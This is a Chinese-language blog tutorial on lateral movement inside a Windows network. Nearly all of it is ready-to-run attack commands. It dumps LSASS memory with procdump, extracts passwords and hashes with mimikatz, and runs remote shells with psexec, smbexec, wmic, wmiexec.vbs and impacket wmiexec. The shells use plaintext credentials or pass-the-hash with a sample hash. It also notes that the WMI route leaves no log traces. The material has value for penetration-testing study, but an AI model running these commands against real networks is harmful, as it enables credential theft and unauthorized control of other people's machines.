您现在的位置是:首页 >学无止境 >内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)网站首页学无止境

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

半个西瓜. 2024-09-25 12:01:12
简介内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

内网安全:横向传递攻击.

横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.


目录:

内网安全:横向传递攻击.

Procdump+Mimikatz 配合获取目标主机密码:

SMB 服务利用(psexec || smbexec)

psexec 利用:

smbexec 利用:

WMI 服务利用.(wmic ||cscript || wmiexec)

(1)自带 WMIC 明文传递 无回显.

(2)自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

(3)套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本


Procdump+Mimikatz 配合获取目标主机密码:

下载procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases
想方法把 procdump 上传在目标主机上.
然后执行这个命令,生成一个 lsass.dmp 文件.(再把他下载在我们主机上进行分析)

procdump -accepteula -ma lsass.exe lsass.dmp

在 mimikatz 上执行:

(1)privilege::debug

(2)sekurlsa::minidump lsass.dmp

(3)sekurlsa::logonPasswords full


SMB 服务利用(psexec || smbexec)

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放.

工具下载:https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec 利用:

(1)Psexec第一种:先有 ipc 链接,psexec 需要明文或 hash 传递.
net use \192.168.0.101ipc$ "admin" /user:Administrator        // ipc 链接

net use \目标主机的 IP 地址ipc$ "目标密码" /user:目标账号
psexec \192.168.0.101 -s cmd        //-s 以 System 权限运行

psexec \目标主机 IP 地址 -s cmd


(2)Psexec 第二种:不用建立 IPC 直接提供明文账户密码.[推荐使用]
psexec \192.168.0.101 -u administrator -p admin -s cmd    // 使用明文连接

psexec \目标主机 IP 地址 -u 账号 -p 密码 -s cmd

密文是在哪收集的.

impacket 工具下载:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip

直接执行是不行的,所以需要使用impacket工具.

psexec -hashes :哈希值密码 ./账号@目标 IP 地址(组)
psexec -hashes :哈希值密码 域名/账号@目标 IP 地址(域)

psexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./Administrator@192.168.0.101


smbexec 利用:

smbexec 无需先 ipc 链接 明文或 hash 传递.【使用 impacket 工具】
(1)smbexec god/administrator:admin@192.168.0.101    (域名的连接)

    #smbexec 域名/账号:密码@目标的IP地址
    
(2)smbexec ./administrator:admin@192.168.0.101     (组的连接)

    #smbexec ./账号:密码@目标的IP地址

(3)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101

    #smbexec -hashes :密文 ./账号@目标的IP地址

(4)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 god/administrator@192.168.0.101

    #smbexec -hashes :密文 域名/账号@目标的IP地址


WMI 服务利用.(wmic ||cscript || wmiexec)

WMI 服务是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,并且该方法不会在
目标日志系统留下痕迹.

(1)自带 WMIC 明文传递 无回显.

wmic /node:192.168.0.101 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >C:1.txt"


(2)自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

cscript //nologo wmiexec.vbs /shell 192.168.0.101 administrator admin

cscript //nologo wmiexec.vbs /shell 目标IP地址 账号 密码


(3)套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin@192.168.0.101 "whoami"        【文明连接】

wmiexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101 "whoami"
【密文连接】

wmiexec ./账号:密码@目标主机的IP地址 "你想要回显信息的命令"【组】

wmiexec 域名/账号:密码@目标主机的IP地址 "你想要回显信息的命令"【域】

     

       

      

学习链接:第67天:内网安全-域横向smb&wmi明文或hash传递_哔哩哔哩_bilibili

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。